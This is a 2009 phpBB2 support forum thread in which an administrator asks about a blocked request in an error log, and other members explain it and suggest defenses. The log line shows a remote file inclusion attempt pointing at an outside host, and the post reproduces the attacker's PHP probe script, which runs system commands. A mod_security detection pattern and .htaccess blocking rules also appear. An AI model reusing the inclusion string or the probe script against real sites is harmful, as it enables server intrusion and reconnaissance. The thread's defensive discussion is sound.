phpBB2Refugees.com Logo
Not affiliated with or endorsed by the phpBB Group

Register •  Login 

Continue the legacy...

Welcome to all phpBB2 Refugees!Wave Smilie

This site is intended to continue support for the legacy 2.x line of the phpBB2 bulletin board package. If you are a fan of phpBB2, please, by all means register, post, and help us out by offering your suggestions. We are primarily a community and support network. Our secondary goal is to provide a phpBB2 MOD Author and Styles area.

What does this line in my error log mean?
2 members found this topic helpful

 
Search this topic... | Search General Support... | Search Box
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Author Message
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 621
Location: Spain


flag
PostPosted: Fri Jan 02, 2009 6:41 pm 
Post subject: What does this line in my error log mean?

Sometimes I find strange things in my error logs, today I found:
Code:
[Fri Jan 02 10:00:01 2009] [error] [client 72.47.211.55] mod_security: Access denied with code 500. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [hostname "www.escuelacaninamaya.com"] [uri "/phpBB2//includes/functions.php?phpbb_root_path=http://maxhost.org/scripts/v7id.txt?"]


What does this mean, some kind of hacking attempt?

The script that is referred to is:
Code:
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }                         

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;


Anybody able to make something out of this?

Greetings.

_________________
phpBB2 will never die, I hope!
Back to top
espicom
Board Member



Joined: 24 Nov 2008

Posts: 55
Location: Woodstock, IL


flag
PostPosted: Fri Jan 02, 2009 11:57 pm 
Post subject: Re: What does this line in my error log mean?

Yes, it's an attempt to get a file to be read in, which should not work on any version of phpBB later than, um, well, certain anything after 2.0.11 would ignore it (actually give the infamous "hacking attempt" response). Unfortunately, a lot of other programs still have vulnerabilities like that...

It's a basic script to return (a) whether or not it can get loaded, and (b) some information about the resources available to steal.
Back to top
Slackervaara
Board Member



Joined: 01 Jan 2009

Posts: 70



PostPosted: Sat Jan 03, 2009 5:57 am 
Post subject: Re: What does this line in my error log mean?

I have stopped this type of cross scripting hacking attempts, that are very common by putting this in .htaccess:

RewriteEngine On

RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
Back to top
espicom
Board Member



Joined: 24 Nov 2008

Posts: 55
Location: Woodstock, IL


flag
PostPosted: Sat Jan 03, 2009 6:23 am 
Post subject: Re: What does this line in my error log mean?

You can also set the access to the includes directory to "deny from all", either in .htaccess (if the server permits that) or the server configuration (if you have that access).
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 621
Location: Spain


flag
PostPosted: Sat Jan 03, 2009 8:50 am 
Post subject: Re: What does this line in my error log mean?

Ah, okay

That's more or less what I had figured, some odd hacking attempt.

I noticed the double // here,
Code:
/phpBB2//includes/functions.php
which makes me think there's some kind of mistake in the script anyway.

I guess that for this kind of stuff the mod_security on my server is enough protection. Am I right?

Greetings.

_________________
phpBB2 will never die, I hope!
Back to top
3Di
Board Member



Joined: 03 Dec 2008

Posts: 15
Location: Italy


flag
PostPosted: Tue Jan 06, 2009 4:47 am 
Post subject: Re: What does this line in my error log mean?

There is not a mod_security Validated out there at phpbb.com, AFAIK. If I correctly recall also it is a kind of useless MOD though.
Back to top
dogs and things
Board Member



Joined: 18 Nov 2008

Posts: 621
Location: Spain


flag
PostPosted: Tue Jan 06, 2009 8:18 am 
Post subject: Re: What does this line in my error log mean?

Mod_security is a service my hosting has installed on their server, as far as I can see in my error logs it's pretty effective because many strange requests are blocked by it.
_________________
phpBB2 will never die, I hope!
Back to top
Jim_UK
Board Member



Joined: 19 Nov 2008

Posts: 556
Location: North West UK


flag
PostPosted: Tue Jan 06, 2009 10:22 am 
Post subject: Re: What does this line in my error log mean?

3Di wrote:
There is not a mod_security Validated out there at phpbb.com, AFAIK. If I correctly recall also it is a kind of useless MOD though.


You recall incorrectly I am afraid.
Mod_security is not a mod at all. The Mod in this case stands for "Module"
Mod_security is an Apache module and is actually very effective. On my own server it blocks at least 10-20 attempts per day to break into the system.


Jim
Back to top
lumpy burgertushie
Board Member



Joined: 19 Nov 2008

Posts: 224


flag
PostPosted: Tue Jan 06, 2009 4:09 pm 
Post subject: Re: What does this line in my error log mean?

and , hosts that install it improperly have created many, many support requests in the last year or so.


robert
Back to top
Display posts from previous:   
Register or Login to Post    Index » General Support  Previous TopicPrint TopicNext Topic
Page 1 of 1 All times are GMT
 
Jump to:  

Index • About • FAQ • Rules • Privacy • Search •  Register •  Login 
Not affiliated with or endorsed by the phpBB Group
Powered by phpBB2 © phpBB Group
Generated in 0.0267 seconds using 15 queries. (SQL 0.0015 Parse 0.0009 Other 0.0243)
phpBB Customizations by the phpBBDoctor.com
Template Design by DeLFlo and MomentsOfLight.com Moments of Light Logo